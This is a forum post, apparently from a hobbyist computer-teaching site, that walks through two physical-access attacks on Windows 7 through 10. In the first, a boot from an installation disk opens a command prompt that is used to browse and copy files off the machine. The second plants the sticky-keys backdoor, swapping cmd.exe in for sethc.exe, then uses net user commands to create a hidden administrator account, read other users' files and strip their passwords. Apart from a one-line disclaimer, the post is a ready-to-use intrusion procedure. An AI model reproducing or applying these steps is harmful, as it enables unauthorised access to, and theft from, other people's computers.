Learn About Computers

Teaching about Computers

    19. Physical Access Hack Windows 7 Ultimate 32 bit Fresh Install Disk


    Posts : 95
    Join date : 2018-03-24

    19. Physical Access Hack Windows 7 Ultimate 32 bit Fresh Install Disk

    Post by Aof on Fri May 25, 2018 1:30 am

    *Note: I do not condone hacking, this is for informational purposes only, please only perform this on drives that you own.*
    19. Physical Access Hack Windows 7 Ultimate 32-bit Fresh Install Disk
    Method 1.
    This Hack works on all, Windows XP-Windows 10 - I haven't tested it on Linux Operating Systems however.
    1. Restart the Pc, Boot from the Windows 7 Ultimate 32-bit Installation disk.
    2. Shift+F10 = Bring up the Hidden Command Prompt.
    3. wmic logicaldisk = lists the drives, and the sizes of the drives.
    4. d: = enters the d drive, you can look in different drives, until you find the correct drive on the Pc.
    You can go anywhere you want and look through the filenames.
    5. wmic logicaldisk = plug in a usb stick, and type this command again, then look for the size of your usb stick, until you find the right one.
    6. You can "copy" or "xcopy" file or files from and to the computer, just by entering both paths like we learned back in the Learn About Computers: Windows Command Prompt Playlist Tutorials, "6. Copy Files & Folders from Pc to Usb" using the Command Prompt Commands.
    Method 2.
    This Hack works on all, Windows 7, Windows 8, Windows 10 - I haven't tested it on Vista, or Linux Operating Systems however it does not work on Windows Xp, since the "sethc.exe" Sticky Keys function wasn't accessable by tapping Shift in that version of Windows.
    1. Boot into Windows 7 Ultimate 32-bit Installation disk.
    2. Shift+F10 = Bring up the hidden Command Prompt.
    3. Navigate to the drive of your operating system, then the windows\system32 directory.
    4. dir seth* = does a file search for anything with seth in the beginning part of
    the name, it should bring back sethc.exe
    5. copy sethc.exe seth2c.exe = makes a copy of sethc.exe and names it seth2c.exe
    6. dir cmd* = lists the files and searches
    for anything with cmd in the beginning part of the name, it should bring back "cmd.exe"
    7. copy cmd.exe cmd2.exe = makes a copy of cmd.exe and names it cmd2.exe
    8. dir cmd* = does another directory search within windows\system32 folder for all files starting with cmd*, you now should be able to see both cmd.exe & cmd2.exe
    9. dir seth* = lists the files beginning with seth, it should bring back sethc.exe and seth2c.exe
    10. rename sethc.exe sethc3.exe = renames the sethc.exe to sethc3.exe
    11. rename cmd2.exe sethc.exe = renames the command prompt file to the sticky key
    application, so that whenever the user boots into the windows and taps shift 5-10 times
    fast, it will open the Command Prompt instead of the sticky-key option.
    12. exit = exits the command prompt, now since you are booted from the disk, in order
    to power down your system, you need to hold the power button for around 10 seconds and
    then start your computer normally and boot into windows as you normally do.
    13. When you are at the login screen, tap shift 5-10 times fast, this will bring up
    the Command Prompt, and start it as an Administrator user.
    14. net user /add username pass1 = creates a user called, "username" and sets the password for that user as "pass1".
    15. net localgroup administrators /add username = gives the user, "username" Administrative rights.
    16. shut down your pc by clicking shutdown icon.
    17. start your pc back up, select the user, "username" at the login screen, it will take
    a while to prepare the desktop since it will be the user's first time booting into it.
    Take a break, listen to some music, and don't be in a hurry, sometimes it takes 5-12
    minutes depending on the system's speed that you are working on. Windows 8 or Windows 10
    usually take longer than Windows 7 Pcs because they have more things to load up and get ready.
    18. Now since you are an Administrator of the Computer, (for Windows 7) you can left
    click, Start
    go to your local C: drive, and enter the users folder, and view content of users of the computer.
    19. If you wanted to login to their username, you can go to the Control Panel, User Accounts, User Accounts, Manage another account, Select a user, then select Remove Password.
        Note: It will remove passwords saved by chrome, and a few files, but it will keep the contents saved within the username.

      Current date/time is Fri Feb 22, 2019 2:43 am